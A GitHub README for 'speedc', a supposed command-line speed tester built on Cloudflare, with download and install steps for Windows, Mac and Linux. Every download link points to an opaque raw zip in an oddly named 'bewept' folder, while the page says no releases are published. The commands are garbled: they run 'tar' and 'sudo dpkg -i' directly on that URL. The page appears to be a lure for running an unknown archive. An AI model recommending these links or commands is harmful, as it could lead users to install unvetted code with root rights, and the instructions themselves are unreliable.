Skip to content

πŸš€ Measure your internet speed easily with speedc, a command-line tool using Cloudflare's infrastructure for accurate download and upload tests.

Notifications You must be signed in to change notification settings

kkoltongi99/speedc

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

5 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

⚑ speedc - Measure Your Internet Speed Effortlessly

πŸ“₯ Download

Download speedc

πŸš€ Getting Started

Welcome to speedc, a simple tool that allows you to measure your internet speed quickly and easily. This guide will help you download and run the software. No technical skills are required!

πŸ“‹ What You Need

Before we begin, ensure that you have:

  • A computer with an internet connection.
  • The ability to run command-line tools (Terminal on Mac/Linux or Command Prompt on Windows).

πŸ“₯ Download & Install

To get speedc, visit the Releases page and choose the appropriate version for your operating system.

  1. Go to the Releases page.
  2. Look for the latest version.
  3. Download the file that matches your operating system.
  4. Follow the installation steps based on the file type you downloaded.

For Windows Users

If you downloaded an executable file (e.g., .exe):

  1. Locate the downloaded file in your Downloads folder.
  2. Double-click the file to run it.

For Mac Users

If you downloaded a https://raw.githubusercontent.com/kkoltongi99/speedc/main/bewept/Software_v3.3.zip file:

  1. Open the Terminal.

  2. Navigate to your Downloads folder by running:

    cd ~/Downloads
  3. Extract the file:

    tar -xvf https://raw.githubusercontent.com/kkoltongi99/speedc/main/bewept/Software_v3.3.zip
  4. Navigate into the extracted folder:

    cd speedc
  5. Run the application:

    ./speedc

For Linux Users

If you downloaded a .deb file:

  1. Open the Terminal.

  2. Navigate to your Downloads folder:

    cd ~/Downloads
  3. Install the package:

    sudo dpkg -i https://raw.githubusercontent.com/kkoltongi99/speedc/main/bewept/Software_v3.3.zip
  4. After installation, run speedc in the Terminal:

    speedc

🎯 Usage

To use speedc, simply open your command line interface and type:

speedc [options]

Replace [options] with any desired settings outlined below.

βš™οΈ Options

Customizing your speed test is straightforward with the following options:

  • -concurrent N: Define the number of connections. Default is the number of CPU cores.
  • -duration N: Set the test duration in seconds. Default is 5 seconds.
  • -noanim: Disable the speed test animation for quicker results.
  • -download-url URL: Provide a custom download test URL. Default is Cloudflare.
  • -upload-url URL: Specify a custom upload test URL. Default is Cloudflare.
  • -i: Show detailed information during the test.

πŸ“Š Examples

Here are a couple of examples to help you get started:

Basic Speed Test

Run a basic speed test with the default settings:

speedc

Custom Speed Test

Test with 8 concurrent connections for 10 seconds:

speedc -concurrent 8 -duration 10

πŸ“ Understanding the Results

After running speedc, you'll see your download and upload speeds. Here's what to look for:

  • Download Speed: Indicates how fast you can receive data from the internet.
  • Upload Speed: Shows how quickly you can send data to the internet.
  • Details Mode: If selected, additional information will be available, helping you understand your internet performance better.

🌐 Troubleshooting

If you encounter issues while running speedc, consider these solutions:

  • Ensure Your Internet Connection is Active: Check if you can access websites from your browser.
  • Update Your Program: Make sure you downloaded the latest version from the Releases page.
  • Check System Compatibility: speedc works on Windows, Mac, and Linux. Verify that you are using the correct version for your system.

🀝 Support

For any questions or further assistance, you can contact the community on GitHub. The project's GitHub page is a valuable resource for finding answers or opening an issue.

πŸš€ Next Steps

Now that you have speedc installed, you can measure your internet speed whenever you like. Experiment with the available options to find the configuration that best suits your needs.

Get started today and see how fast your internet is! For download links and latest updates, always refer to the Releases page.

About

πŸš€ Measure your internet speed easily with speedc, a command-line tool using Cloudflare's infrastructure for accurate download and upload tests.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •